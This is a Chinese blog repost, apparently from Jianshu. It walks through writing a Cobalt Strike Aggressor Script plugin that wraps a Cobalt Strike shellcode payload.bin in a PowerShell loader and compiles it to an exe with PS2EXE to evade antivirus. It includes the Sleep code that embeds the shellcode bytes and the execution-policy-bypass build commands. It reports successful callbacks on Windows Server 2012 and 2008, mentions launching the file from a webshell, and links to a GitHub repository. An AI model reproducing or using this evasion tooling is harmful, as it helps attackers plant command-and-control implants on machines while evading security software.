转载https://www.jianshu.com/p/f158a9d6bdcf

前言

在接触到Cobalt Strike的时候就知道有各种插件,想象着那天也可以自己学习编写一个。在之前分析Cobalt Strike powershell木马的时候,正好看到了Win-PS2EXE 项目用来编译为exe,免杀效果还不错且大小只有几十KB。即如此,何不利用Aggressor Script 编写一个cna脚本用来实现Win-PS2EXE编译为exe?

Sleep 语言

我们都知道Cobalt Strike的插件现在都由Aggressor Script语言编写,由Sleep语言解析。对于Sleep语言网上学习的资料比较少,还好这个语言学起来也比较简单。
先下载Sleep语言 http://sleep.dashnine.org/download/sleep.jar
命令java -jar sleep.jar 即可启用。

 

而后我们新建一个cna文件,cna是Aggressor Script脚本的后缀。
在cna文件里编写sleep语言,load该cna文件即可执行。

Sleep 语法

Sleep语法手册:http://sleep.dashnine.org/manual/
这里着重看一下我在编写powershell免杀时着重用到的基础语法。和php的一些函数很类似。

mkdir

global

sub

exec

byteAt

还有一些不太一样的地方,比如运算符的两边必须加空格。

$int = 3;

println($int - 1);

否则就异常。

菜单的编写

创建一个自定义菜单

menubar("powershell免杀","test");  # 注册一级菜单

popup test {

    item("&生成exe",{dialog_test()});  # 子菜单,点击时调用dialog_test函数

}

Cobalt Strike 加载cna脚本后,效果如下

 

输入框的编写

现在编写dialog_test函数,用来用户的输入

menubar("powershell免杀","test");  # 一级菜单

popup test {

    item("&生成exe",{dialog_test()});  # 子菜单,点击时调用dialog_test函数

}

sub dialog_test {

    $info = dialog("powershell bypass av",%(ps2exe => "ps2exe.ps1",bin => "payload.bin",payload => "payload_cs.ps1",version => "",output_exe => "bypass.exe"),&show);

    #第一个是菜单的名字,第二个是我们定义的菜单显示内容的默认值,第三个参数是我们回调函数,触发show函数的时候显示,并将值传递

    drow_file($info,"bin","Choose: default payload.bin");

    drow_text($info, "payload", "生成ps1"); # drow_text文本框的输入

    drow_combobox($info, "version", "Version: ", @("powershell 4.0", "powershell 2.0"));

    drow_text($info,"output_exe","输出地址:");

    dbutton_action($info,"点击生成!"); # dbutton_action将操作按钮添加到dialog,回调函数

    dialog_show($info); # 显示文本输入框

}

sub show {

    println("\n加载bin文件:".$3["bin"]."\n输出payload文件:".$3["payload"]."\n版本是:".$3["version"]."\n输出exe地址:".$3["output_exe"]);

    show_message("\n加载bin文件:".$3["bin"]."\n输出payload文件:".$3["payload"]."\n版本是:".$3["version"]."\n输出exe地址:".$3["output_exe"]);

}

定义diolog数据模型,会有三个函数传递给shou方法

$1 为dialog的引用

$2 按钮的名称

$3 对话框输入的值

show_message以弹框的方式显示消息,println则会显示在Script Console中。
效果如下:

 
 

powershell免杀

免杀的生成还是借用的 Powershell免杀从入门到实践,利用powershell加载恶意bin文件,生成ps1文件,再借助PS2EXE编译为exe。
生成powershell_cs.ps1 文件,用的是正则匹配加载器powershell_load.ps1文件,将[System.IO.File]::ReadAllBytes('payload.bin')直接替换为读取bin文件的字符。
代码如下

global('$char_code');

global('$new_strs');

sub payload_bin_to_ps1 {

    $in = openf('payload.bin');

    $data = readb($in, -1);

    for ($x = 0; $x < strlen($data); $x++)

    {

        $shellcode = (byteAt($data, $x) . ",");

        $char_code = $char_code.$shellcode;

    }

    $char_code = left($char_code, int(strlen($char_code)) - 1);

    $org_file = 'powershell_load.ps1';

    $handle = openf($org_file);

    while $text (readln($handle)){

        $rep = replace($text, 'acode.*=.*', 'acode='.$char_code)."\n";

        $new_strs = $new_strs.$rep;

    }

    $filestring = right($new_strs, int(strlen($new_strs)) - 1);

    $out =  openf(">$payload_file_ps1");

    writeb($out, $filestring);

    closef($out);

    closef($in);

    $new_strs = '';

    $char_code = '';

}

编译为exe则直接用exec命令。

$process = exec('powershell.exe -ExecutionPolicy bypass  -command "F:\cstemp\.\ps2exe.ps1 -inputFile F:\cstemp\powershell_load.ps1 -outputFile F:\cstemp\aaa.exe -noConsole -runtime40" ');

println($process);

@data = readAll($process);

println(@data)

closef($process);

因为本身是利用的powershell 4.0,利用.NET Framework 4.x 环境编译为exe,所以在win10、server 2012 上都可以正常上线。

 

但如果还想在server 2008 上上线,就需要使用-runtime20选项,意思是利用powershell 2.0编译为exe

 

当我在win10上使用-runtime20选项时,程序直接处于等待状态。

 

只能手动去结束这个进程。尝试多次无果。
但测试发现换一个命令就可以正常执行结束,且没有多余的进程。

$process = exec('cmd.exe /c echo F:\cstemp\.\ps2exe.ps1 -inputFile F:\cstemp\powershell_load.ps1 -outputFile F:\cstemp\bbb.exe -noConsole -runtime20 | powershell -');

@data = readAll($process);

println(@data)

closef($process);

在server 2008上测试可上线。

 

利用ps2exe.ps1编译成exe时需要注意当前powershell版本,且默认以当前powershell版本编译,无法运行在比它高的版本上,只能向下兼容。

使用

在导入cna脚本之前,只需要修改当前路径$path为powershell_bypass.cna所在的真实路径即可。
注意:均是两个斜杠

 

选择Cobalt Strike生成BIN文件。

 

启用该cna脚本,选择指定的bin文件,点击生成恶意的ps1文件、exe可执行文件,

 
 
 

点击即可上线。
使用powershell 4.0上线server 2012

 

使用powershell 2.0上线server 2008

 

如果在webshell触发该可执行文件,需要start命令

 

总结

将ps2exe.ps1以另一种方式将其可视化,学习了Aggressor Script 基础语法。
相关代码已上传github:https://github.com/cseroad/bypassAV

参考资料

https://wiki.wgpsec.org/knowledge/intranet/Aggressor-script.html
https://github.com/MScholtes/PS2EXE

 

Aggressor Script 开发-Powershell 免杀的更多相关文章

  1. Powershell免杀

    Powershell免杀 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线.然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法. 后面还是没 ...

  2. Powershell免杀从入门到实践

    转载https://www.jianshu.com/p/fb078a99e0d8 前言 文章首发于Freebuf 在之前发布的一篇 渗透技巧之Powershell实战思路 中,学习了powershel ...

  3. Atitit.木马病毒的免杀原理---sikuli 的使用

    Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api1 1.1. 3. Write code!1 2. 常用api2 2.1. wait 等待某个界面出 ...

  4. Kail Linux渗透测试教程之免杀Payload生成工具Veil

    Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具——Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...

  5. 迁移Veil:手工打造Windows下编译的免杀Payload

    作者:RedFree 本文转自乌云 Veil对Payload的免杀已经做的很好了,最新的Veil有39个可用的Payload.但是有时候需要使用Windows来完成所有的渗透测试工作,Linux和Wi ...

  6. shellcode 免杀(一)

    工具免杀 选择了几个简单或者近期还有更新的免杀工具进行学习 ShellcodeWrapper https://github.com/Arno0x/ShellcodeWrapper 该工具的原理是使用异 ...

  7. 20182217刘洪宇EXP3_免杀原理

    免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主 ...

  8. shellcode隐写到像素RGB免杀上线到CS

    利用把Shellcode隐写到图片像素RGB进行免杀上线到CS --by:chenw 0x01 前言 前几天跟一个朋友一起搞一个站的时候,发现那个站点开了很多杀软,使用CS的powershell马无法 ...

  9. BadUsb配合Cobalt-Strike免杀上线

    BadUsb配合Cobalt-Strike免杀上线 前言: 原理简介:Badusb的原理是将恶意代码预置在固件之中,当受害人插入USB时,就会执行恶意代码进行恶意操作.Badusb将恶意代码预存在U盘 ...

随机推荐

  1. python 管理工具

    pip 包管理工具 virtualenv 虚拟环境管理工具 切换目录 virtualenvwrapper 虚拟环境管理工具加强版 pyenv python版本管理工具 修改环境变量 pyenv-vir ...

  2. OpenCV 之 特征检测

    特征,也称 兴趣点 或 关键点,如下:蓝框内区域平坦,无特征:黑框内有"边缘",红框内有"角点",后二者都可视为"特征" 角点作为一种特征, ...

  3. js学习笔记之日期倒计时(天,时,分,秒)

    <!doctype html> <html> <head> <meta charset="utf-8"> <title> ...

  4. 获取windows 操作系统下的硬件或操作系统信息等

    奇怪的工作,制作的是一款办公应用软件,领导却要求我统计用户计算机的物理信息,什么CPU的型号.核心数,什么内存信息等各种乱七八糟的用户信息.我想问,现在用户的信息就这么没有隐私性了么?想获取就获取传递 ...

  5. PXE高效装机

    目录 一.PXE概述 二.PXE的优点 三.搭建PXE的前提 四.部署PXE远程安装服务 1.安装TFTP服务 2.修改TFTP服务的配置文件,并开启服务 关闭防火墙 3.安装DHCP服务 4.修改D ...

  6. 离线webpack创建vue 项目

    参考地址: https://blog.csdn.net/feinifi/article/details/104578546 画重点: // 需要带上参数--offline表示离线初始化. --offl ...

  7. 剑指 Offer 39. 数组中出现次数超过一半的数字

    剑指 Offer 39. 数组中出现次数超过一半的数字 数组中有一个数字出现的次数超过数组长度的一半,请找出这个数字. 你可以假设数组是非空的,并且给定的数组总是存在多数元素. 示例 1: 输入: [ ...

  8. 跟我一起写 Makefile(七)

    使用变量 ---- 在Makefile中的定义的变量,就像是C/C++语言中的宏一样,他代表了一个文本字串,在Makefile中执行的时候其会自动原模原样地展开在所使用的地方.其与C/C++所不同的是 ...

  9. Golang语言系列-19-发布系统

    发布系统 后端代码:https://gitee.com/lichengguo/yiihua_ops_go 前端代码:https://gitee.com/lichengguo/yiihua_ops_ht ...

  10. Git(7)-- 查看提交历史(git log 命令详解)

    @ 目录 1.git clone 2.git log 3.git log -p 4.git log --stat 5.git log --pretty=oneline 6.git log --pret ...